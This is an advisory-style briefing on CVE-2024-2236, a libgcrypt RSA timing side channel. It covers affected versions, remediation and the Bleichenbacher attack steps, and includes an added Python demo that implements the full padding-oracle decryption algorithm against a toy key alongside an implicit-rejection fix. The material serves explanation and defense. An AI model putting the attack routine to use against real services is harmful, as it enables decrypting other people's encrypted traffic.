libgcrypt: timing-based side-channel flaw in libgcrypt's RSA implementation (CVE-2024-2236) #shorts

Summary

Welcome to today’s cybersecurity briefing. We’re discussing CVE-2024-2236, a moderate-severity timing-based side-channel vulnerability in libgcrypt’s RSA implementation. This flaw can be exploited remotely to mount a Bleichenbacher-style attack, potentially decrypting RSA ciphertexts.

Product details

The issue affects libgcrypt, the GNU cryptographic library that Linux distributions and applications use for their cryptographic operations. Note that the "lessThan 9.4.0" version range in the CVE record does not correspond to libgcrypt's own numbering, which has always been 1.x, so do not look for a libgcrypt 9.4.0: treat any build without the vendor fix as vulnerable and go by your distribution's advisory. Red Hat, for example, ships the fix in libgcrypt 1.10.0-11.el9 for Red Hat Enterprise Linux 9; SUSE has also issued an advisory and patches.

Vulnerability type summary

This is an observable timing discrepancy (CWE-208). The time libgcrypt takes to handle an RSA PKCS#1 v1.5 decryption depends on whether the padding check succeeds, so an attacker who can measure response times obtains a padding oracle: one bit per query about the decrypted value. That oracle breaks the confidentiality of PKCS#1 v1.5 encrypted messages; it does not recover the private key.

Details of the vulnerability

In libgcrypt’s RSA PKCS#1 v1.5 decryption path, execution time differs measurably depending on whether the decrypted block carries valid padding. An attacker who can submit ciphertexts to a service that decrypts with the affected library (a TLS server offering RSA key exchange, for example) sends chosen ciphertexts derived from the target ciphertext and records the response times. Separating the "valid padding" and "invalid padding" timing distributions statistically yields the oracle that Bleichenbacher's 1998 attack needs, and repeated queries narrow the plaintext down to a single value without ever touching the private key; this is the timing variant of the attack publicised in 2023 as the Marvin attack. SUSE has released patches; Red Hat’s updated RPMs mark versions 1.10.0-11.el9 and later as unaffected on Red Hat Enterprise Linux 9.

Conclusion

CVE-2024-2236 shows that side channels undermine even well-established algorithms like RSA whenever an implementation's timing depends on secret data. Administrators and developers should apply the vendor's fixed libgcrypt packages promptly (1.10.0-11.el9 or later on Red Hat Enterprise Linux 9; consult your distribution's advisory for other products). Where you control the protocol, stop relying on RSA PKCS#1 v1.5 encryption altogether: TLS 1.3 has no RSA key exchange, and RSA-OAEP or an (EC)DHE key agreement is designed to resist chosen-ciphertext attacks (their implementations must still be constant-time). Validate your supply chain, monitor for unusual volumes of failed RSA decryptions or handshakes, and stay current on cryptographic library patches to maintain data confidentiality.

Watch the full video on YouTube: CVE-2024-2236

Remediation and exploitation details

This chain involves the following actors

  • Remote attacker: Initiates the timing-based side-channel and Bleichenbacher-style decryption attack

The following systems are involved

  • libgcrypt (provides the RSA encryption and decryption routines): vulnerable component in every build that lacks the vendor fix (on Red Hat Enterprise Linux 9, anything older than 1.10.0-11.el9; the "9.4.0" in the CVE record is not a libgcrypt version)
  • Dependent applications (use libgcrypt for RSA operations, for example TLS servers or secure messaging): indirectly at risk through the vulnerable library

Attack entry point

  • RSA decryption interface: the libgcrypt function handling RSA PKCS#1 v1.5 decryption, reachable through whatever application protocol accepts attacker-supplied ciphertexts
  • Response timing and error feedback: observable differences in processing time (or, in other implementations, in error messages) depending on whether the padding check succeeds or fails

Remediation actions

  • System administrator → libgcrypt: upgrade to the vendor package that carries the fix (on Red Hat Enterprise Linux 9, libgcrypt 1.10.0-11.el9 or later; other distributions publish their own fixed package versions).
  • Library maintainer → libgcrypt: make PKCS#1 v1.5 decryption constant-time and remove any observable difference between valid and invalid padding, for example with implicit rejection (on a padding failure, return a pseudo-random message of plausible length instead of an error), the mitigation several major libraries adopted after the Marvin attack disclosure.

Exploitation actions

Service enumeration

  • Remote attacker → dependent applications: identify a service that decrypts attacker-supplied RSA ciphertexts with an unpatched libgcrypt and returns an observable result, so it can serve as a decryption oracle.
  • Example: scanning TLS servers for RSA key-exchange cipher suites (TLS_RSA_WITH_*, only offered up to TLS 1.2) and for version banners that identify the library build.

Chosen-ciphertext queries

  • Remote attacker → libgcrypt: send chosen ciphertexts derived from the target ciphertext c, namely c' = c·s^e mod n for attacker-chosen s, so that each decryption yields m·s mod n and the validity of its padding leaks one bit about m.
  • Example: substituting such a modified ciphertext for the RSA-encrypted premaster secret in a TLS handshake and repeating the handshake for many values of s.

Timing analysis

  • Remote attacker → libgcrypt: measure the response time (and any error code) for each ciphertext and classify it as "padding valid" or "padding invalid".
  • Example: the timing differences are on the order of nanoseconds to microseconds and are buried in network jitter, so each candidate ciphertext is sent many times and the two timing distributions are compared statistically rather than read off a single measurement.

Plaintext interval narrowing

  • Remote attacker → libgcrypt: each "valid" answer proves 2B ≤ m·s mod n < 3B, where B = 2^(8(k−2)) for a k-byte modulus; this translates into a set of candidate intervals for m, and successive answers intersect those intervals following Bleichenbacher’s method.
  • Example: recomputing the interval bounds after each confirmed s and choosing the next s so that the remaining interval roughly halves.

Iterative decryption recovery

  • Remote attacker → libgcrypt: repeat the query, measurement and narrowing steps until a single candidate remains; that value is the padded plaintext, and stripping the padding yields the original message (a TLS premaster secret, for instance).
  • Example: with a clean oracle, Bleichenbacher’s original analysis puts the cost at roughly a million chosen ciphertexts for a 1024-bit key; a noisy timing oracle needs many repeated measurements per ciphertext on top of that.
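The exploitation steps above (chosen ciphertexts, a one-bit oracle, interval narrowing, iterative recovery) and the implicit-rejection fix named under remediation actions, as one added Python illustration that is not part of the original briefing and is not libgcrypt's code. Everything in it is constructed for the demo: the RSA key (two Mersenne primes giving a 150-bit modulus, trivially factorable and chosen only so the attack runs in seconds), the message, the HMAC salt, and the oracle function, which hands back the leaked bit directly because a Python timing measurement would not be meaningful. The interval arithmetic is Bleichenbacher's 1998 algorithm, steps 2 and 3.

```python
"""Toy Bleichenbacher (PKCS#1 v1.5 padding-oracle) attack on a simulated leaky RSA
decryptor, plus an implicit-rejection decryptor that removes the oracle.  Added
illustration only, not libgcrypt code; the key is a tiny, insecure demo key."""
import hashlib
import hmac
import random

P, Q = 2**61 - 1, 2**89 - 1          # constructed demo key (Mersenne primes), trivially factorable
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8        # modulus length in bytes (19)
B = 2 ** (8 * (K - 2))               # Bleichenbacher's B: a conforming m lies in [2B, 3B)

def pkcs1_v15_pad(msg: bytes, rng: random.Random) -> int:
    """EME-PKCS1-v1_5: 00 02 || PS (>= 8 nonzero random bytes) || 00 || M."""
    ps_len = K - 3 - len(msg)
    if ps_len < 8:
        raise ValueError("message too long for this modulus")
    ps = bytes(rng.randrange(1, 256) for _ in range(ps_len))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")

def encrypt(msg: bytes, seed: int = 1) -> int:
    return pow(pkcs1_v15_pad(msg, random.Random(seed)), E, N)

def padding_oracle(c: int) -> bool:
    """The one bit a timing leak gives the attacker: fast 'bad 00 02 prefix' exit or
    slower 'prefix ok' path.  Returned directly here; the real flaw leaks it via time."""
    em = pow(c, D, N).to_bytes(K, "big")
    return em[0] == 0 and em[1] == 2

def ceil_div(x: int, y: int) -> int:
    return -(-x // y)

def merge(intervals):
    """Sort and merge overlapping or adjacent closed intervals."""
    out = []
    for a, b in sorted(intervals):
        if out and a <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], b))
        else:
            out.append((a, b))
    return out

def bleichenbacher(c: int, oracle):
    """Recover m = c^d mod N from the oracle alone (Bleichenbacher 1998, steps 2-3);
    returns (m, queries).  Blinding (step 1) is skipped: a real ciphertext is conforming."""
    queries = 0

    def ask(s: int) -> bool:
        nonlocal queries
        queries += 1
        return oracle(c * pow(s, E, N) % N)      # this ciphertext decrypts to m*s mod N

    M = [(2 * B, 3 * B - 1)]
    s = ceil_div(N, 3 * B)                       # step 2a: smallest conforming s >= N/3B
    while not ask(s):
        s += 1
    while True:
        new = []                                 # step 3: each conforming s shrinks M
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo, hi = max(a, ceil_div(2 * B + r * N, s)), min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = merge(new)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0], queries
        if len(M) > 1:                           # step 2b: several intervals, linear search
            s += 1
            while not ask(s):
                s += 1
        else:                                    # step 2c: one interval, roughly halve it
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), N)
            while True:
                lo, hi = ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a
                hit = next((t for t in range(lo, hi + 1) if ask(t)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1

def decrypt_implicit_rejection(c: int, key_salt: bytes = b"demo-key-salt") -> bytes:
    """Mitigation sketch: never signal a padding failure.  Bad padding yields a
    deterministic pseudo-random message derived from the ciphertext (fixed length here).
    Real code also makes the checks constant-time, which Python cannot guarantee."""
    em = pow(c, D, N).to_bytes(K, "big")
    sep = em.find(b"\x00", 2)
    ok = em[0] == 0 and em[1] == 2 and sep >= 10     # PS must be at least 8 bytes
    synthetic = hmac.new(key_salt, c.to_bytes(K, "big"), hashlib.sha256).digest()[:K - 11]
    return em[sep + 1:] if ok else synthetic

if __name__ == "__main__":
    c = encrypt(b"secret42")
    m, q = bleichenbacher(c, padding_oracle)
    em = m.to_bytes(K, "big")
    plain = em[em.find(b"\x00", 2) + 1:]
    print(f"recovered {plain!r} after {q} oracle queries")
```

Running the file recovers the message after a few tens of thousands of oracle queries. The count is governed by B/N (about 2^-14 for this modulus, 2^-16 for a byte-aligned one), not by the key size, which is why the same procedure scales to real keys once the oracle bit can be read from timing. Against decrypt_implicit_rejection the same chosen ciphertexts all come back with a plausible-looking message, so there is no accept/reject signal left to feed the interval narrowing.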

Related Content

CVE database technical details

CVE ID
CVE-2024-2236
Description
A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts.
Provider
redhat
CWE / problem types
Observable Timing Discrepancy
Affected Software Versions
  • Vendor/product not specified in the record: versions from 0 up to but not including 9.4.0 ("semver"), status affected. This range does not match libgcrypt's own 1.x numbering; rely on the vendor entries below.
  • Red Hat Enterprise Linux 9: 0:1.10.0-11.el9 and later (rpm), unaffected
  • Red Hat Enterprise Linux 9.2 Extended Update Support: 0:1.10.0-10.el9_2.1 and later (rpm), unaffected
  • Red Hat Enterprise Linux 9.4 Extended Update Support: 0:1.10.0-10.el9_4.1 and later (rpm), unaffected
  • Red Hat Enterprise Linux 6, 7, 8 and 10: no version data in the record
Date Published
2024-03-06T22:07:16.617Z
Last Updated
2025-08-03T11:24:55.627Z